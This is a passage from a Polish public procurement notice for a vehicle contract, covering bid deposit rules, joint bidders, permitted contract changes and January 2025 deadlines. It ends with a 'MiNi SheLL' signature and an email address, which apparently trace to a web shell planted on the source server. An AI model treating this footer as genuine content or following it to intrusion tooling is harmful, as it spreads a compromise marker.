umocowanie do reprezentowania Wykonawcy, w tym pełnomocnictwo do podpisania<br/>oferty, o ile prawo do podpisania oferty nie wynika<br/>z innych dokumentów dołączonych do oferty;<br/>11.1.3. Oświadczenie/oświadczenia Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie zamówienia o<br/>niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu - wypełnione zgodnie z Załącznikiem nr 2a i 2b do<br/>SWZ;<br/>11.1.4. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w pkt 8.2. SWZ -<br/>wzór oświadczenia stanowi załącznik nr 7 do SWZ;<br/>11.1.5. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 7.5. SWZ - załącznik nr 6 do SWZ, jeśli<br/>Wykonawca korzysta z zasobów innych podmiotów;<br/>11.1.6. Oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu – Załącznik nr 6a do SWZ;<br/>11.1.7. Dowód wniesienia wadium: wymagany - w przypadku wnoszenia wadium w formach wymienionych w pkt 11.1.3 lit.<br/>b)-d) SWZ, zaleca się - w przypadku wnoszenia wadium w pieniądzu.<br/>11.1.8. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125<br/>ust. 1 Pzp, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu.<br/>11.1.9. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o<br/>zwalczaniu nieuczciwej konkurencji (tj. Dz.U. z 2022 r. poz. 1233 ze zm.) które Wykonawca zastrzeże jako tajemnicę<br/>przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik<br/>stanowiący tajemnicę przedsiębiorstwa&#34; a następnie wraz z plikami stanowiącymi jawną część i skompresowane do jednego<br/>pliku archiwum (ZIP).<br/>Zamawiający informuje że przez tajemnicę przedsiębiorstwa rozumie się informacje techniczne, technologiczne,<br/>organizacyjne przedsiębiorstwa lub inne informacje posiadające wartość gospodarczą, które jako całość lub w szczególnym<br/>zestawieniu<br/>i zbiorze ich elementów nie są powszechnie znane osobom zwykle zajmującym się tym rodzajem informacji albo nie są<br/>łatwo dostępne dla takich osób, o ile uprawniony do korzystania z informacji lub rozporządzania nimi podjął, przy zachowaniu należytej staranności, działania w celu utrzymania ich w poufności.<br/>11.1.10. odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy/podmiotu<br/>udostępniającego zasoby jest umocowana do jego reprezentowania. Wykonawca nie jest zobowiązany do złożenia<br/>dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile Wykonawca/podmiot udostępniający zasoby dostarczy dane umożliwiające dostęp do<br/>tych dokumentów,<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp oraz zobowiązanie podmiotu udostępniającego zasoby,<br/>o którym mowa w art. 118 ust. 3 Pzp sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach<br/>wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne (tj. Dz.U. z 2023 r. poz. 57 ze zm.) z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 Pzp, z<br/>uwzględnieniem rodzaju przekazywanych danych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 11.1. Wadium:<br/>11.1.1. Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości 5.000,00 PLN (słownie: pięć<br/>tysięcy i 00/100 PLN).<br/>11.1.2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>UWAGA: wniesienie wadium w pieniądzu - za pomocą przelewu bankowego – Zamawiający będzie uważał za skuteczne<br/>tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu<br/>składania ofert.<br/>11.1.3. Wadium może być wniesione w następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2020 roku, poz. 299 ze zm.).<br/>11.1.4. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona<br/>zgodnie z obowiązującym prawem i winna zawierać następujące elementy:<br/>a) nazwę dającego zlecenie (Wykonawcy) , a w przypadku składania oferty wspólnej – firmy albo nazwy wszystkich<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia), , beneficjenta gwarancji/poręczenia (Zamawiającego),<br/>gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,<br/>b) określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>c) kwotę gwarancji,<br/>d) termin ważności gwarancji,<br/>e) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego musi obejmować<br/>sytuację, o których mowa w art. 98 ust. 6 ustawy Pzp.<br/>11.1.5. Postanowienia pkt 11.1.4. stosuje się odpowiednio do poręczeń, określonych powyżej w pkt 11.1.3. lit d).<br/>11.1.6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego wskazany w<br/>Rozdziale I (Nazwa oraz adres Zamawiającego), z dopiskiem na przelewie jakiego postępowania dotyczy.<br/>11.1.7. Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach określonych w pkt 11.1.3 należy<br/>przekazać Zamawiającemu w oryginale, w postaci elektronicznej.<br/>11.1.8. Zwrot wadium następuje na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/>11.1.9. Zatrzymania wadium następuje w przypadkach określonych w art. 98 ust. 6 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 8.1. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 6.1. SWZ powinni spełniać łącznie wszyscy<br/>Wykonawcy. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni dokumenty potwierdzające<br/>spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 7.6.1. i 7.6.2. SWZ.<br/>8.2. W odniesieniu do warunków dotyczących doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych Wykonawców, którzy wykonają usługi lub dostawy do realizacji których te zdolności są<br/>wymagane. W przypadku, o którym mowa w pkt 6.1.4 SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które usługi lub/i dostawy wykonają poszczególni wykonawcy –<br/>Załącznik nr 8 do SWZ<br/>8.3. Wykonawcy, o których mowa w 8.1. SWZ ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się,<br/>aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8.4. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>8.5. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą,<br/>przed podpisaniem umowy o realizację zamówienia, mogą zostać wezwani do przedstawienia Zamawiającemu umowy<br/>regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień niniejszej Umowy może nastąpić w przypadkach, o których mowa w art. 455 Pzp.<br/>2. Na podstawie art. 455 ust. 1 pkt. 1 Pzp, Zamawiający przewiduje następujące zmiany postanowień Umowy:<br/>1) w zakresie wyeliminowania oczywistych omyłek pisarskich i rachunkowych,<br/>2) w zakresie Przedmiotu Umowy - w sytuacji, gdy w czasie realizacji Umowy produkcja danego pojazdu zostanie<br/>zakończona lub ograniczona, po zaproponowaniu przez Wykonawcę pojazdu o parametrach jakościowych nie gorszych od<br/>parametrów określonych dla pierwotnego Przedmiotu Umowy.<br/>3. Katalog zmian Umowy, o których mowa w ust. 1-2 nie powoduje powstania jakiegokolwiek roszczenia Wykonawcy w<br/>stosunku do Zamawiającego i nie stanowi zobowiązania Zamawiającego do wyrażenia zgody na te zmiany, w sytuacji, gdy<br/>inicjatywa wprowadzenia zmian pochodzi od Wykonawcy.<br/>4. Nie stanowią zmiany Umowy:<br/>1) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana<br/>nr rachunku bankowego),<br/>2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami.<br/>5. Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej w postaci aneksu podpisanego przez obie Strony<br/>pod rygorem nieważności <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-01-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamówienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-01-29 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com